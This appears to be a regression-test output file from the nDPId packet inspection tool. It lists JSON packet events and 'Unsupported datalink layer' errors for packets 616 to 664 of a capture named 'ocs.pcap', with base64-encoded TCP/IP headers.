-00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":616,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLTQABABoAWwKi0ArL40DbC2QBQ64tGkd7wznOAEC\/qr\/gAAAEBCAoANZIDRwYjFg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":617,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826072} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":617,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLUQABABoAVwKi0ArL40DbC2QBQ64tGkd7w09+AEC\/qqowAAAEBCAoANZIDRwYjFg=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":618,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826081} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":618,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLVQABABoAUwKi0ArL40DbC2QBQ64tGkd7w2UuAEC\/qpRwAAAEBCAoANZIERwYjGQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":619,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826083} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":619,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLWQABABoATwKi0ArL40DbC2QBQ64tGkd7w3reAEC\/qn7AAAAEBCAoANZIERwYjGQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":620,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826126} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":620,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLXQABABoASwKi0ArL40DbC2QBQ64tGkd7w5COAEC\/qmjMAAAEBCAoANZIJRwYjJQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":621,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826127} 
-00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":621,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLYQABABoARwKi0ArL40DbC2QBQ64tGkd7w6Y+AEC\/qlMcAAAEBCAoANZIJRwYjJQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":622,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826130} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":622,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLZQABABoAQwKi0ArL40DbC2QBQ64tGkd7w7vuAEC\/Wj24AAAEBCAoANZIJRwYjJg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":623,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826130} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":623,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLaQABABoAPwKi0ArL40DbC2QBQ64tGkd7w9GeAEC\/BihcAAAEBCAoANZIJRwYjJg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":624,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826165} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":624,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLbQABABoAOwKi0ArL40DbC2QBQ64tGkd7w+dOAEC\/qhHMAAAEBCAoANZIMRwYjMg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":625,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826165} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":625,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLcQABABoANwKi0ArL40DbC2QBQ64tGkd7w\/z+AEC\/qfwYAAAEBCAoANZINRwYjMg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":626,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826174} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":626,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLdQABABoAMwKi0ArL40DbC2QBQ64tGkd7xCheAEC\/qdCwAAAEBCAoANZIORwYjMw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":627,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826201} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":627,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLeQABABoALwKi0ArL40DbC2QBQ64tGkd7xFO+AEC\/qaUoAAAEBCAoANZIQRwYjOw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":628,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826204} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":628,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLfQABABoAKwKi0ArL40DbC2QBQ64tGkd7xH8eAEC\/qXm4AAAEBCAoANZIRRwYjPg=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":629,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826229} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":629,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLgQABABoAJwKi0ArL40DbC2QBQ64tGkd7xKp+AEC\/qU5QAAAEBCAoANZITRwYjPg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":630,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826233} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":630,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLhQABABoAIwKi0ArL40DbC2QBQ64tGkd7xNXeAEC\/qSLYAAAEBCAoANZITRwYjRA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":631,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826242} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":631,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLiQABABoAHwKi0ArL40DbC2QBQ64tGkd7xQE+AEC\/qPd0AAAEBCAoANZIURwYjRA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":632,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826263} 
-00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":632,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLjQABABoAGwKi0ArL40DbC2QBQ64tGkd7xSyeAEC\/qMvsAAAEBCAoANZIWRwYjTA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":633,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826303} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":633,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLkQABABoAFwKi0ArL40DbC2QBQ64tGkd7xVf+AEC\/qKB8AAAEBCAoANZIaRwYjTA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":634,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826322} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":634,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLlQABABn\/4wKi0ArL40DbC2QBQ64tGkd7xVf+wEC\/qd98AAAEBCAoANZIcRwYjTAEBBQre8Vtr3vFg1w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":635,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826331} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":635,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLmQABABn\/3wKi0ArL40DbC2QBQ64tGkd7xVf+wEC\/qcnIAAAEBCAoANZIdRwYjTAEBBQre8Vtr3vFmQw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":636,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826331} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":636,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLnQABABn\/2wKi0ArL40DbC2QBQ64tGkd7xVf+wEC\/qbQYAAAEBCAoANZIdRwYjTAEBBQre8Vtr3vFrrw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":637,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826385} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":637,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLoQABABn\/1wKi0ArL40DbC2QBQ64tGkd7xVf+wEC\/qZ5QAAAEBCAoANZIjRwYjTAEBBQre8Vtr3vFxGw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":638,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826400} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":638,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMLpQABABn\/swKi0ArL40DbC2QBQ64tGkd7xVf\/QEC\/qjEwAAAEBCAoANZIkRwYjTAEBBRLe8Xvz3vGBX97xW2ve8XEb"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":639,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826781} 
-00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":639,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLqQABABn\/zwKi0ArL40DbC2QBQ64tGkd7xcRuwEC+XG34AAAEBCAoANZJKRwYjpgEBBQre8Xvz3vGBXw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":640,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826860} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":640,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMLrQABABn\/qwKi0ArL40DbC2QBQ64tGkd7xcRvQEC\/WKkAAAAEBCAoANZJSRwYjpgEBBRLe8YbL3vGMN97xe\/Pe8YFf"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":641,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826861} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":641,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMLsQABABn\/pwKi0ArL40DbC2QBQ64tGkd7xcRvQEC\/WJNQAAAEBCAoANZJSRwYjpgEBBRLe8YbL3vGRo97xe\/Pe8YFf"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":642,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827279} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":642,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMLtQABABn\/owKi0ArL40DbC2QBQ64tGkd7xdofQEC\/BHrcAAAEBCAoANZJ8RwYkQgEBBRLe8YbL3vGRo97xe\/Pe8YFf"} -00171{"error_event_id":3,"error_event_name":"Unsupported 
datalink layer","datalink":12,"packet_id":643,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827343} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":643,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMLuQABABn\/nwKi0ArL40DbC2QBQ64tGkd7xdofQEC\/BGUUAAAEBCAoANZKCRwYkQgEBBRLe8YbL3vGXD97xe\/Pe8YFf"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":644,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827790} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":644,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLvQABABn\/uwKi0ArL40DbC2QBQ64tGkd7xgV+wEC+s6TAAAAEBCAoANZKvRwYkrQEBBQre8YbL3vGXDw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":645,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827858} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":645,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMLwQABABn\/lwKi0ArL40DbC2QBQ64tGkd7xgV\/QEC+szNIAAAEBCAoANZK2RwYkrQEBBRLe8Zx73vGh597xhsve8ZcP"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":646,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827860} 
-00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":646,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMLxQABABn\/kwKi0ArL40DbC2QBQ64tGkd7xgV\/QEC+sx2YAAAEBCAoANZK2RwYkrQEBBRLe8Zx73vGnU97xhsve8ZcP"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":647,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827918} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":647,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLyQABABn\/rwKi0ArL40DbC2QBQ64tGkd7xlw+wEC+XrVsAAAEBCAoANZK8RwYk5gEBBQre8Zx73vGnUw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":648,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827927} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":648,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLzQABABn\/2wKi0ArL40DbC2QBQ64tGkd7xp1OAEC\/W1KEAAAEBCAoANZK9RwYk5g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":649,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827927} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":649,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQML0QABABn\/pwKi0ArL40DbC2QBQ64tGkd7xp1OwEC\/Wl2sAAAEBCAoANZK9RwYk5gEBBQre8aHn3vGnUw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":650,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827927} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":650,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML1QABABn\/0wKi0ArL40DbC2QBQ64tGkd7xrL+AEC\/Bz0oAAAEBCAoANZK9RwYk5g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":651,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827969} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":651,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML2QABABn\/zwKi0ArL40DbC2QBQ64tGkd7xsiuAEC\/qyaYAAAEBCAoANZLBRwYk8Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":652,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827970} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":652,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML3QABABn\/ywKi0ArL40DbC2QBQ64tGkd7xt5eAEC\/qxDgAAAEBCAoANZLBRwYk8w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":653,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827977} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":653,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML4QABABn\/xwKi0ArL40DbC2QBQ64tGkd7xvQOAEC\/qvskAAAEBCAoANZLCRwYk9Q=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":654,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828011} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":654,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML5QABABn\/wwKi0ArL40DbC2QBQ64tGkd7xwm+AEC\/quU0AAAEBCAoANZLFRwYlAg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":655,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828014} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":655,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML6QABABn\/vwKi0ArL40DbC2QBQ64tGkd7xx9uAEC\/qs+EAAAEBCAoANZLFRwYlAg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":656,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828019} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":656,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML7QABABn\/uwKi0ArL40DbC2QBQ64tGkd7xzUeAEC\/WrocAAAEBCAoANZLGRwYlAw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":657,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828073} 
-00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":657,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML8QABABn\/twKi0ArL40DbC2QBQ64tGkd7x0rOAEC\/qqPoAAAEBCAoANZLLRwYlCw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":658,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828075} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":658,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML9QABABn\/swKi0ArL40DbC2QBQ64tGkd7x2B+AEC\/qo40AAAEBCAoANZLMRwYlCw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":659,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828078} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":659,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML+QABABn\/rwKi0ArL40DbC2QBQ64tGkd7x3YuAEC\/WnjMAAAEBCAoANZLMRwYlDQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":660,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828080} -00325{"packet_event_id":1,"packet_event_name":"packet","packet_id":660,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML\/QABABn\/qwKi0ArL40DbC2QBQ64tGkd7x4veAEC\/BmNwAAAEBCAoANZLMRwYlDQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":661,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828158} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":661,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMAQABABn\/pwKi0ArL40DbC2QBQ64tGkd7x6GOAEC\/qkzMAAAEBCAoANZLURwYlGQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":662,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828160} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":662,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMBQABABn\/cwKi0ArL40DbC2QBQ64tGkd7x6GOwEC\/qviwAAAEBCAoANZLURwYlGQEBBQre8e3P3vHzOw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":663,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828184} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":663,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMMCQABABn\/TwKi0ArL40DbC2QBQ64tGkd7x6GPQEC\/q6XkAAAEBCAoANZLXRwYlGQEBBRLe8fin3vH+E97x7c\/e8fM7"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":664,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828185} 
